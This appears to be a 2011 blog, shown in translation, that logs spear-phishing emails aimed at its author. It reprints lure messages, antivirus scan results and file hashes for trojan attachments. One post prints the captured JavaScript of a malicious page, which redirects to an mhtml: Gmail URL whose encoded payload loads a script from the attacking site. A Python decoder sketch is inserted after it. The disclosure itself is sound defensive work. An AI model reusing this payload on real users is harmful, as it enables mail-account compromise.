Tuesday, March 22, 2011

Received another virus email. Fwd: Let's keep it up together

Gao Ming received it too:
http://www.flickr.com/photos/gaoming/5551894777/

His analysis:

Fetching the page over telnet to port 80 returns the following source:

$ telnet www.solidaritycenter.org 80
Trying 198.65.135.49...
Connected to www.solidaritycenter.org.
Escape character is '^]'.
GET www.solidaritycenter.org/files/India.html

function twd() {
var sUserAgent = navigator.userAgent;
var isWin = (navigator.platform == "Win32") || (navigator.platform == "Windows");

if (isWin) {
var isWin2K = sUserAgent.indexOf("Windows NT 5.0") > -1 || sUserAgent.indexOf("Windows 2000") > -1;
var isWinXP = sUserAgent.indexOf("Windows NT 5.1") > -1 || sUserAgent.indexOf("Windows XP") > -1;
var isWin2003 = sUserAgent.indexOf("Windows NT 5.2") > -1 || sUserAgent.indexOf("Windows 2003") > -1;
if (isWin2K || isWinXP ||isWin2003) document.location="mhtml:https://mail.google.com/mail/h/nwnibaprolyc/?ServiceLogin=accounts&service=mail&passive=true&rm=false&continue=ServiceLogin&s=l&l=%250aContent-Type: multipart/related; boundary=boundary%250aa%250d%250d--boundary%250a%2520Content-Location:twd%250a%2520Content-Transfer-Encoding:base64%250d%250dPHNjcmlwdCBzcmM9aHR0cDovL3d3dy5zb2xpZGFyaXR5Y2VudGVyLm9yZy9maWxlcy9JbmRpYS5qcz48L3NjcmlwdD4=%250d%250d--boundary--%250a&!twd";

var isWinVista = sUserAgent.indexOf("Windows NT 6.0") > -1 || sUserAgent.indexOf("Windows Vista") > -1;
var isWin7 = sUserAgent.indexOf("Windows NT 6.1") > -1 || sUserAgent.indexOf("Windows 7") > -1;
if (isWin7 || isWinVista ) document.location="mhtml:https://mail.google.com/mail/h/nwnibaprolyc/?ServiceLogin=accounts&service=mail&passive=true&rm=false&continue=ServiceLogin&s=l&l=%0aContent-Type: multipart/related; boundary=boundary%0aa%0d%0d--boundary%0a%20Content-Location:twd%0a%20Content-Transfer-Encoding:base64%0d%0dPHNjcmlwdCBzcmM9aHR0cDovL3d3dy5zb2xpZGFyaXR5Y2VudGVyLm9yZy9maWxlcy9JbmRpYS5qcz48L3NjcmlwdD4=%0d%0d--boundary--%0a&!twd";

return "other"; 
}

twd();

Connection closed by foreign host.
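
The two redirect strings in the listing above differ only in how many times the injected section is percent-encoded (%250a versus %0a). The following Python sketch, added here as an illustration and not part of the original post or of Gao Ming's analysis, decodes such an mhtml: URL and recovers the base64 MIME part it carries; the function names are hypothetical and SAMPLE is copied from the Windows 2000/XP/2003 branch of the listing.

```python
import base64
import re
from urllib.parse import unquote

# Redirect target copied from the twd() listing above (Windows 2000/XP/2003 branch).
SAMPLE = (
    "mhtml:https://mail.google.com/mail/h/nwnibaprolyc/?ServiceLogin=accounts"
    "&service=mail&passive=true&rm=false&continue=ServiceLogin&s=l"
    "&l=%250aContent-Type: multipart/related; boundary=boundary%250aa%250d%250d"
    "--boundary%250a%2520Content-Location:twd%250a%2520Content-Transfer-Encoding:base64"
    "%250d%250dPHNjcmlwdCBzcmM9aHR0cDovL3d3dy5zb2xpZGFyaXR5Y2VudGVyLm9yZy9maWxlcy9JbmRpYS5qcz48L3NjcmlwdD4="
    "%250d%250d--boundary--%250a&!twd"
)

def fully_unquote(s, max_rounds=5):
    """Percent-decode until stable: the XP branch is double-encoded (%250a -> %0a -> LF)."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s

def extract_mhtml_parts(url):
    """Return (Content-Location, decoded body) for each MIME part carried in an mhtml: URL."""
    if not url.lower().startswith("mhtml:"):
        return []
    text = fully_unquote(url[len("mhtml:"):])
    match = re.search(r"boundary=([^\s;&]+)", text)
    if not match:
        return []
    parts = []
    for chunk in text.split("--" + match.group(1))[1:]:
        if chunk.startswith("--"):  # closing delimiter "--boundary--"
            break
        # Normalise CR, LF and CRLF; headers end at the first blank line (CR CR here).
        chunk = re.sub(r"\r\n?|\n", "\n", chunk).strip("\n")
        head, _, body = chunk.partition("\n\n")
        headers = {}
        for line in head.split("\n"):
            if ":" in line:
                name, value = line.split(":", 1)
                headers[name.strip().lower()] = value.strip()
        body = body.strip()
        if headers.get("content-transfer-encoding", "").lower() == "base64":
            body = base64.b64decode(body).decode("utf-8", "replace")
        parts.append((headers.get("content-location"), body))
    return parts
```

On the sample this returns a single part with Content-Location twd whose body is a script tag referencing India.js on the same host, which is the file an analyst would examine next.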



---------- Forwarded message ----------
From: alf oic <[email protected]>
Date: 2011/3/23
Subject: Let's keep it up together
To: [email protected]


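It must be admitted that some countries really are working hard to change the status quo. Perhaps it is not doing well enough yet, but let us hope it keeps getting better. Let's keep it up together...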
http://www.solidaritycenter.org/files/India.html

Sunday, March 6, 2011

Fwd: Hello, Director Zhou

The attachment 我的離職工作交接清單.rar ("My resignation handover checklist") is a virus; it extracts to 我的離職工作交接清單.scr

File name: 我的離職工作交接清單.scr
Submission date: 2011-03-06 18:52:20 (UTC)
Antivirus Version Last Update Result
AhnLab-V3 2011.03.06.02 2011.03.06 -
AntiVir 7.11.4.84 2011.03.06 -
Antiy-AVL 2.0.3.7 2011.03.06 -
Avast 4.8.1351.0 2011.02.23 -
Avast5 5.0.677.0 2011.03.06 -
AVG 10.0.0.1190 2011.03.06 -
BitDefender 7.2 2011.03.06 Gen:Trojan.Heur.FU.cqX@aWSq48ni
CAT-QuickHeal 11.00 2011.03.06 -
ClamAV 0.96.4.0 2011.03.05 -
Commtouch 5.2.11.5 2011.03.05 -
Comodo 7894 2011.03.06 -
DrWeb 5.0.2.03300 2011.03.06 Trojan.Obfuscated.based.1
Emsisoft 5.1.0.2 2011.03.06 -
eSafe 7.0.17.0 2011.03.06 -
eTrust-Vet 36.1.8198 2011.03.04 -
F-Prot 4.6.2.117 2011.03.05 -
F-Secure 9.0.16440.0 2011.03.06 Gen:Trojan.Heur.FU.cqX@aWSq48ni
Fortinet 4.2.254.0 2011.03.06 -
GData 21 2011.03.06 Gen:Trojan.Heur.FU.cqX@aWSq48ni
Ikarus T3.1.1.97.0 2011.03.06 -
Jiangmin 13.0.900 2011.03.06 -
K7AntiVirus 9.92.4032 2011.03.05 -
Kaspersky 7.0.0.125 2011.03.06 -
McAfee 5.400.0.1158 2011.03.06 -
McAfee-GW-Edition 2010.1C 2011.03.06 -
Microsoft 1.6603 2011.03.06 -
NOD32 5931 2011.03.06 -
Norman 6.07.03 2011.03.06 W32/Obfuscated.D!genr
nProtect 2011-02-10.01 2011.02.15 -
Panda 10.0.3.5 2011.03.06 -
PCTools 7.0.3.5 2011.03.06 Backdoor.Bredolab
Prevx 3.0 2011.03.06 -
Rising 23.47.06.03 2011.03.06 -
Sophos 4.63.0 2011.03.06 -
SUPERAntiSpyware 4.40.0.1006 2011.03.06 -
Symantec 20101.3.0.103 2011.03.06 -
TheHacker 6.7.0.1.145 2011.03.06 -
TrendMicro 9.200.0.1012 2011.03.06 -
TrendMicro-HouseCall 9.200.0.1012 2011.03.06 -
VBA32 3.12.14.3 2011.03.04 -
VIPRE 8618 2011.03.06 -
ViRobot 2011.3.6.4343 2011.03.06 -
VirusBuster 13.6.237.0 2011.03.06 Trojan.Hupigon.Gen!Pac.6
Additional information
MD5   : 52e8c0d7b2572054198b2d4dc401bc47
SHA1  : fe33516c78c672e4a1cad5b79ba8c9caece7c12f
SHA256: 5c852ecd95b3f9dc3ec3f2682bb37acc5719ca280ecfa639af6d3e8d9d6f6270


---------- Forwarded message ----------
From: ceopey <[email protected]>
Date: 2011/3/6
Subject: Hello, Director Zhou
To: "zuola.com" <zuola.com@gmail.com>


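Dear Director Zhou,

    Hello!

    Thank you very much for the care and guidance you have given me since 2009. I greatly miss the days of working and living at your side, which kept me in high spirits at all times and filled me with drive for the future. But I am very sorry that I did not do my work well this year and failed to live up to your expectations, and that your own performance record was affected as a result; I bear direct responsibility that I cannot shirk.

    I hope you can understand my decision to resign. Having worked overseas for so many years, I have had only ten-odd days each year with my family; even though I returned to China frequently this year, I really spent only a few days with them. My child is now over 4 years old and needs more of a father's love and upbringing, and my parents are elderly and need their children's care. At the same time, I am honestly not very career-driven; what I want most is a happy family life. After leaving I will study for an MBA for two years, to recharge and spend more time with my family, and then look for work as a vocational training instructor; I still prefer a very free, unconstrained working environment.

    Thank you sincerely for your care and guidance. The relevant work has been handed over and compiled into a list in the attachment; please look it over. Take care!

Attachment: 我的離職工作交接清單.rar (24K)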

Saturday, March 5, 2011

Fwd: report

The attached report.doc has been uploaded to http://file.zuo.la/virusmail/2011MAR/report.doc.virus

Another virus.
File name: report.doc
Submission date: 2011-02-24 23:59:38 (UTC)
Current status: finished
Result: 6/43 (14.0%)
Antivirus Version Last Update Result
AhnLab-V3 2011.02.25.00 2011.02.24 -
AntiVir 7.11.3.230 2011.02.24 -
Antiy-AVL 2.0.3.7 2011.02.23 -
Avast 4.8.1351.0 2011.02.23 RTF:CVE-2010-3333
Avast5 5.0.677.0 2011.02.23 RTF:CVE-2010-3333
AVG 10.0.0.1190 2011.02.25 -
BitDefender 7.2 2011.02.25 -
CAT-QuickHeal 11.00 2011.02.24 -
ClamAV 0.96.4.0 2011.02.24 -
Commtouch 5.2.11.5 2011.02.24 CVE-2010-3333!Camelot
Comodo 7799 2011.02.24 -
DrWeb 5.0.2.03300 2011.02.25 -
Emsisoft 5.1.0.2 2011.02.24 -
eSafe 7.0.17.0 2011.02.24 -
eTrust-Vet 36.1.8182 2011.02.24 -
F-Prot 4.6.2.117 2011.02.24 -
F-Secure 9.0.16160.0 2011.02.24 -
Fortinet 4.2.254.0 2011.02.24 Data/CVE20103333.A!exploit
GData 21 2011.02.24 RTF:CVE-2010-3333
Ikarus T3.1.1.97.0 2011.02.24 -
Jiangmin 13.0.900 2011.02.24 -
K7AntiVirus 9.90.3949 2011.02.24 -
Kaspersky 7.0.0.125 2011.02.25 -
McAfee 5.400.0.1158 2011.02.25 -
McAfee-GW-Edition 2010.1C 2011.02.24 -
Microsoft 1.6603 2011.02.24 Exploit:Win32/CVE-2010-3333
NOD32 5905 2011.02.24 -
Norman 6.07.03 2011.02.24 -
nProtect 2011-02-10.01 2011.02.15 -
Panda 10.0.3.5 2011.02.24 -
PCTools 7.0.3.5 2011.02.24 -
Prevx 3.0 2011.02.25 -
Rising 23.46.03.06 2011.02.24 -
Sophos 4.61.0 2011.02.24 -
SUPERAntiSpyware 4.40.0.1006 2011.02.24 -
Symantec 20101.3.0.103 2011.02.25 -
TheHacker 6.7.0.1.139 2011.02.24 -
TrendMicro 9.200.0.1012 2011.02.24 -
TrendMicro-HouseCall 9.200.0.1012 2011.02.24 -
VBA32 3.12.14.3 2011.02.23 -
VIPRE 8527 2011.02.24 -
ViRobot 2011.2.24.4327 2011.02.24 -
VirusBuster 13.6.219.0 2011.02.24 -
Additional information
MD5   : 6fb137d0077b4aaa1c9d6eff31a9766b
SHA1  : 4c4eb2821b2e843791ab5918ef53b5a3ff67c7cd
SHA256: 1e3f7657ba136251dd708d9691bd9a5a46ab2eef4f4df4d1c5e7d9f2e03e79d6





---------- Forwarded message ----------
From: volunteero <[email protected]>
Date: 2011/2/24
Subject: report
To: zuola.com@gmail.com


This is He xing, female, 21 years old, report for reference material

Attachment: report.doc (1K)

Zhou Shuguang's Weblog